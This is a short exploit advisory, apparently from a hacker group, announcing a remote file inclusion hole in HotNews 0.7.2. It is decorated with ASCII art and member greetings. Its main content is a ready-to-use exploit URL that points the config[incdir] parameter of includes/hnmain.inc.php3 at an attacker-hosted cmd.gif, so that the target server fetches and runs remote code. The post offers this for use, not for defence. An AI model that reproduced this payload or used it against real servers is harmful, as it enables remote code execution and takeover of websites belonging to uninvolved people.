================================================================================================
================================================================================================
==   @@@@@@@@  @@@@@@  @@@@@@@  @@       @@            @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==   @@@@@@@@  @@@@@@  @@@@@@@  @@@     @@@         @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==      @@     @@      @@   @@  @@ @   @ @@            @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@  @ @  @@            @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@@@@@@  @@   @   @@            @@@@@@  @@      @@     @@     @@@@@@   ==
==      @@     @@      @@   @@  @@       @@            @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@       @@            @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@   @@  @@       @@            @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==      @@     @@@@@@  @@   @@  @@       @@ @@@@@@@@@@ @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==                            ==
================================================================================================
================================================================================================
     |||                                    |||
     |||          |||
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
[[                                                                          [[
[[ HotNews 0.7.2 Remote File Inclusion Vulnerability                                [[
[[                              [[
[[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ |                 [[
[[                              [[
[[                              [[
[[ ##   Exploit:                                      [[
[[                              [[
[[- http://[target]/[path]/includes/hnmain.inc.php3?config[incdir]=[attacker.com]/cmd.gif???                            [[
[[                              [[
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
     |||          |||
     |||          |||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~    Greetz and Thanks to: All member gcc, all member manadocoding   ~~~~
~~~~                  ~~~~
~~~~    MC & gcc team : team_elite , devilbat , zreg , doniskynet , 0pa ~~~~
~~~~    thanks for : cr4wl3r [ http://shell4u.tk/ ]            ~~~~
~~~~                  ~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* -                          ,              
* -                        @@               
* -                      @@#                
* -                    :@@;                 
* -                   @@@@@        ......`  
* -                  @@@@.@@@@@@@@@@@#      
* -             @@@@@@@@@@@@@@@@@@`         
* -               @@@@@@@@@@@@@@@@@@@@;     
* -              #@@@@@@@@@@@@@@@@@         
* -            `@@,@@@@@@@@@@@@@@@@@:       
* -           @@@+@@@@@@@ @@@@@@@;@@@`      
* -         :@@@@@@@@@:@,; @@@@@@@ .@@      
* -        @@@@@@@@@@@  :  @@@@@@@@  @@     
* -       @@@@'     `   ` @@@@@@@@@:  +.    
* -       .@@            @@@@@@@@@@@   .    
* -           ,       +@@@@@@@@@@@@@        
* -            +@@@@@@@@@@@@@@@@@@@@#       
* -           ,@@@@@@@@@@@@@@@@@ +@@@       
* -        `@@@@@@@@@@@@@@@@@@@   @@@       
* -       @@@@@@@@@@@@@@@@@@@     @@`       
* -      @@@@@@@@@@@@@@@@@@       @@        
* -     +@@@@@@@@@@; @@@#         @         
* -     @@@@@@@@@         :                 
* -     @@@@@@@@           ,@@              
* -    @@@@@@@@@             @@@'           
* -    @@@@@@@`@               @@@;         
* -    @@@@@@@  @       @.  @@@@@@@@        
* -    @@@@@@@@@        @@@@@@@@@@@@@#      
* -     @@@@@@@@@@@@    @@@@@@@@@@@@@@@     
* -     @ @@@@@@@     ;@@@@@@@@@@@@@@@@@    
* -     @ @@@@@@@@@@@@@@@@@@@      ,@@@@+   
* -       @@@@@@@@@@@@@@@@@@@        @@@@   
* -       @@@ @@@@@@@@@  @@@@@@;     @@@@   
* -       @@    @@@@@@@`  @@@        . @@.  
* -       @@      ; @@@@#  :@@@@@#     @@.  
* -       @           @@@:             ;@   
* -      ;`             @@             ;@   
* -                      @@            @    
* -                       @            #    
* -                       :           :     
* --------------------------------------------->>>> bugs found on 11 April 2010 by team_elite.